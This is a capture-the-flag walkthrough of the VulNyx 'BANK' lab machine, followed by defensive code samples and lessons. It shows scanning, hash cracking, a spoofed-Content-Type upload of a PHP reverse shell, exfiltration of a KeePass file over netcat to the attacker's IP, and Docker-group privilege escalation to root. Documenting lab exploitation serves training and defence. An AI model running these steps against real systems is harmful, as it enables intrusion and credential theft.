Bank
VulNyx - BANK Writeup
Target Information
- Platform: VulNyx.com
- Machine Name: BANK
- Key Vulnerabilities:
- SMB Anonymous Share Access
- Information Disclosure
- JWT Information Leakage
- Weak Administrative Credentials
- File Upload Bypass
- Remote Code Execution (RCE)
- KeePass Credential Exposure
- Docker Group Privilege Escalation
Network Discovery
First, scan the local network to identify active hosts using arp-scan.
sudo arp-scan --localnet
Result
$ sudo arp-scan --localnet
[sudo] password for arc:
Sorry, try again.
[sudo] password for arc:
Sorry, try again.
[sudo] password for arc:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:8d:a8:e2, IPv4: 172.29.112.76
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
172.29.112.109 fe:f7:e9:58:e3:54 (Unknown: locally administered)
172.29.112.122 62:70:c1:a1:26:26 (Unknown: locally administered)
172.29.112.170 00:0c:29:09:d5:97 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.098 seconds (122.02 hosts/sec). 3 responded
The target machine IP address was identified as:
172.29.112.170
Enumeration
Nmap Scan
Perform a full TCP port scan:
nmap -n -Pn -sS -p- --min-rate 5000 172.29.112.170
Scan Results
$ nmap -n -Pn -sS -p- --min-rate 5000 172.29.112.170
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-29 02:00 -0700
Nmap scan report for 172.29.112.170
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:09:D5:97 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.29 seconds
Findings
- Port 80 - HTTP
- Port 139 - NetBIOS
- Port 445 - SMB
The SMB service appeared particularly interesting and was selected for further enumeration.
Web Enumeration
Opening the website redirected the browser to:
http://bank.nyx
Since the domain could not be resolved, add it to the /etc/hosts file:
172.29.112.170 bank.nyx
After refreshing the page, the Bank Alpha website loaded successfully.
Observation
A notice on the homepage stated:
Coming Soon: Bank Alpha Public Launch Q3 2026
This suggested that the application was still under development and might contain security misconfigurations.
Directory Enumeration
Use Gobuster to search for hidden directories:
gobuster dir -u http://bank.nyx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Result
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bank.nyx
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
server-status (Status: 403) [Size: 313]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
No additional directories were discovered.
SMB Enumeration
Enumerate SMB shares anonymously:
smbclient -L //172.29.112.170/ -N
Result
$ smbclient -L //172.29.112.170/ -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
development Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.22.8-Debian-4.22.8+dfsg-0+deb13u1)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 172.29.112.170 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
Important Finding
An anonymous SMB share named development was accessible.
Accessing the SMB Share
Connect to the share anonymously:
smbclient //172.29.112.170/development -N
List the files and download them:
ls
mget *
Transcript:
$ smbclient //172.29.112.170/development -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 3 03:43:20 2026
.. D 0 Sun May 3 03:43:20 2026
03-may-26.txt N 1141 Sun May 3 03:43:20 2026
9627844 blocks of size 1024. 6209724 blocks available
smb: \> mget *
Get file 03-may-26.txt? y
getting file \03-may-26.txt of size 1141 as 03-may-26.txt (31.0 KiloBytes/sec) (average 31.0 KiloBytes/sec)
smb: \>
Information Disclosure
Reading the contents of 03-may-26.txt revealed:
Subject: AI Agent Integration & Development Environment Setup
To streamline and accelerate the development of the banking platform, we have decided to integrate a subscription-based AI agent into our workflow.
The service has proven to be cost-effective; however, please be aware that the AI may occasionally produce incorrect or unexpected outputs.
For this reason, it is important to maintain strict attention to security and validate all critical operations.
A dedicated development directory has been enabled where developers can access and test the application.
Dir: development-0119-d5e051a-9da2-12sdas1-775-e0174
Additionally, the system administrator user called Juan, hired by Lucas in recent days, is currently on a probationary training period within the company.
He will be responsible for completing the configuration of the SMB service. While the service is already installed, some final setup steps are
still pending. Please note that he is still gaining experience, so we kindly ask for patience and encourage collaboration and assistance if needed
to ensure everything is properly configured.
Best regards,
Marcelo
Important Finding
A development directory was disclosed:
development-0119-d5e051a-9da2-12sdas1-775-e0174
Navigate to:
http://bank.nyx/development-0119-d5e051a-9da2-12sdas1-775-e0174
A login and registration portal was discovered.
Account Registration
Register a new account and log in to the application.
After logging in, navigate through the Summary section and identify the account verification feature.
Testing the username admin confirmed that the administrator account exists.
JWT Analysis
Capture the verification Response using Burp Suite.
Inspect the JWT token using the JWT-Editor extension.
Important Finding
The JWT token contained:
- Username : admin
- Password hash :
$2y$12$X4uppQvzwFCSbVfCH7qF1eNOSA6/cBy/o5sbVcxxdfu/GF7.a0YKi
for the administrator account.
Password Cracking
Extract the bcrypt hash and crack it using John the Ripper:
john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Result
$ john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182 (?)
1g 0:00:00:05 DONE (2026-05-30 01:50) 0.1901g/s 41.06p/s 41.06c/s 41.06C/s peanut..jessie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Administrator Credentials
Username: admin
Password: blink182
OTP Disclosure
Log in as the administrator using the recovered credentials.
The application requested a One-Time Password (OTP).
Capture the request using Burp Suite and inspect the JWT token.
Important Finding
The JWT payload contained:
otp = 540294
Enter the OTP and successfully authenticate as the administrator.
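As an added illustration of the two findings above (the bcrypt hash in the verification token and the OTP in the login token), and not code from the writeup: a stdlib-only Python script that mints a constructed HS256 token, decodes its payload without the signing key, and flags claims that should never be inside a JWT. The claim names, the signing secret and the hash value are constructed placeholders, not values from the target.

```python
import base64
import hashlib
import hmac
import json
import re

# Claim names that should never ride in a JWT payload: the payload is only
# base64url-encoded, so anyone holding the token reads it without the key.
SENSITIVE_KEYS = {"password", "password_hash", "hash", "otp", "secret"}
# Shape of a bcrypt hash: $2a/$2b/$2y, two-digit cost, 22-char salt + 31-char digest.
BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(segment: str) -> bytes:
    # JWT strips base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def make_hs256_token(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token, standing in for the application's issuer (constructed)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def decode_payload(token: str) -> dict:
    """Read the claims without the secret: this is what the JWT Editor tab displays."""
    return json.loads(b64url_decode(token.split(".")[1]))

def find_sensitive_claims(payload: dict) -> list:
    """Claim names that leak secrets, matched by key name or by bcrypt-looking value."""
    found = []
    for key, value in payload.items():
        if key.lower() in SENSITIVE_KEYS:
            found.append(key)
        elif isinstance(value, str) and BCRYPT_RE.match(value):
            found.append(key)
    return sorted(found)

def audit_token(token: str) -> list:
    return find_sensitive_claims(decode_payload(token))

# Constructed sample mirroring the writeup's two leaks (placeholder values only):
# a bcrypt hash in the verification token and an OTP in the login token.
SAMPLE_PAYLOAD = {"username": "admin", "pwd_hash": "$2y$12$" + "a" * 22 + "b" * 31, "otp": 123456}
SAMPLE_TOKEN = make_hs256_token(SAMPLE_PAYLOAD, b"constructed-demo-secret")
```

A token is a bearer credential, not a vault: anything in the payload is disclosed to whoever holds it, which is why a hash (or a live OTP) in a claim is a finding even when the signature is valid.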
File Upload Bypass
The administrator panel contained a profile update feature that allowed file uploads.
The form stated that only JPG, JPEG, and PNG files are allowed.
Generate the "PHP PentestMonkey" reverse shell from https://www.revshells.com/, save it to a file, and upload it.
Capture the upload request in Burp Suite.
Original header:
Content-Type: application/x-php
Modify it to:
Content-Type: image/png
Forward the request.
The application returned a 500 Internal Server Error; despite this, the file was still written to the server.
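Added example, not code from the writeup or from the target application: a Python model of the check that was bypassed (trusting the request's Content-Type header) beside a server-side validator keyed on an extension allowlist and the file's leading bytes. The function names, the sample PHP body and the PNG sample are constructed for the demonstration.

```python
import os
import secrets

# Extensions the profile form claims to accept, with the magic bytes each must
# begin with. The client-supplied Content-Type plays no part in the decision.
ALLOWED_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
PHP_TAGS = (b"<?php", b"<?=")

def naive_check(declared_type: str) -> bool:
    """The pattern the writeup bypasses: accept whatever Content-Type the client sends."""
    return declared_type in {"image/png", "image/jpeg"}

def validate_upload(filename: str, declared_type: str, data: bytes) -> tuple:
    """Server-side decision: extension allowlist, file signature, and a polyglot guard.
    declared_type is only echoed in the rejection reason, never trusted."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(ALLOWED_SIGNATURES[ext]):
        return False, f"content is not {ext}; client declared {declared_type}"
    if any(tag in data for tag in PHP_TAGS):
        return False, "image carries an embedded PHP tag"
    return True, "ok"

def storage_name(filename: str) -> str:
    """Server-chosen name: random token plus the validated extension, so the
    original name (including any double extension) never reaches the filesystem."""
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()

# Constructed samples: a PHP body sent with a spoofed image/png header, as in the
# writeup, and a minimal PNG signature followed by filler bytes.
SPOOFED_PHP = b"<?php echo 'constructed placeholder'; ?>"
PNG_SAMPLE = ALLOWED_SIGNATURES[".png"] + b"\x00" * 16
```

Storing the file under a server-chosen name in a directory that the web server will not execute closes the remaining path to code execution even if a check is wrong.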
Uploaded File Discovery
Inspect subsequent requests and identify the uploads directory:
/development-0119-d5e051a-9da2-12sdas1-775-e0174/uploads/
Navigate to the directory.
The PHP reverse shell file was uploaded successfully.
Netcat Listener
Start a listener on the attacker machine:
nc -lvnp 443
Remote Code Execution
Trigger the uploaded PHP reverse shell.
Result
$ nc -lnvp 443
listening on [any] 443 ...
connect to [172.29.112.76] from (UNKNOWN) [172.29.112.170] 57018
Linux bank 6.12.85+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.85-1 (2026-04-30) x86_64 GNU/Linux
Successfully obtained a reverse shell as www-data.
Upgrading the Shell
Spawn a Bash shell:
script /dev/null -c bash
Press:
Ctrl + Z
Configure the terminal:
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
The shell is now fully interactive.
Sensitive Files Discovery
While enumerating directories, the following files were discovered:
www-data@bank:/srv/smb/passwords$ ls
note.txt passwords.kdbx
Read the note.txt:
cat note.txt
Result
Hey, as you said Marcelo, I've already left a KeePass file with all the system passwords you asked me to create, except for the root password.
The KeePass password is: `@zm{2h8aUu'a_M;'Jd:!MAQ?zn
Delete it after reading, but don't worry, I think I've configured this directory properly so only you can access
it, and it's not exposed on the SMB service either.
- Juan
Important Finding
The KeePass master password was disclosed.
Retrieving the KeePass Database
Transfer the database to the attacker machine.
On Target
nc 172.29.112.76 4444 < passwords.kdbx
On Attacker
nc -lvnp 4444 > passwords.kdbx
Open the database using KeePassXC. To install it:
sudo apt install keepassxc
To open the database:
keepassxc passwords.kdbx
Enter the password:
`@zm{2h8aUu'a_M;'Jd:!MAQ?zn
Important Finding
Credentials for the user marcelo were stored in the database.
Username: marcelo
Password: m4rC1!#asl2#vsHj4!
User Access
Switch to the Marcelo account:
su - marcelo
Enter the password.
Verify access:
hostname ; id
Result
marcelo@bank:/srv/smb/passwords$ hostname ;id
bank
uid=1000(marcelo) gid=1000(marcelo) groups=1000(marcelo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),105(docker)
Important Finding
The user belongs to the docker group.
User Flag
cat /home/marcelo/user.txt
52728f2b72b6a153a415d8***********
Privilege Escalation via Docker
Enumerate available Docker images:
docker images
Result
marcelo@bank:/srv/smb/passwords$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
debian bookworm-slim 865980b94764 5 weeks ago 74.8MB
Since the user belongs to the docker group and can therefore instruct the Docker daemon, which runs as root, a container can be started with the host filesystem mounted inside it to obtain root access on the host.
Execute:
docker run -v /:/host -it --rm debian:bookworm-slim chroot /host bash
Root Access
Verify privileges:
marcelo@bank:/srv/smb/passwords$ docker run -v /:/host -it --rm debian:bookworm-slim chroot /host bash
root@d9a79b7c88f0:/# id ;
uid=0(root) gid=0(root) groups=0(root)
root@d9a79b7c88f0:/#
Successfully escalated privileges to root.
Root Flag
root@d9a79b7c88f0:/# find / -type f -name root.txt 2>/dev/null
/root/root.txt
root@d9a79b7c88f0:/# cat /root/root.txt
e8bd8213ff4f6b805dec90**********
root@d9a79b7c88f0:/#
Summary
| Phase | Technique |
|---|---|
| Network Discovery | arp-scan |
| Enumeration | Nmap |
| SMB Enumeration | Anonymous Share Access |
| Information Disclosure | Development Notes |
| Web Exploitation | JWT Analysis |
| Credential Recovery | Hash Cracking |
| Authentication Bypass | OTP Disclosure |
| Remote Code Execution | File Upload Bypass |
| Credential Harvesting | KeePass Database |
| Privilege Escalation | Docker Group Abuse |
| Root Access | Host Filesystem Mount |
Key Takeaways
- Anonymous SMB shares can expose sensitive development information.
- JWT tokens should never contain passwords or password hashes.
- Trusting the client-supplied Content-Type header is not sufficient for upload security; the file must be validated on the server.
- Password databases should never be stored alongside their master password in plaintext.
- Membership in the Docker group effectively grants root-level access to the host.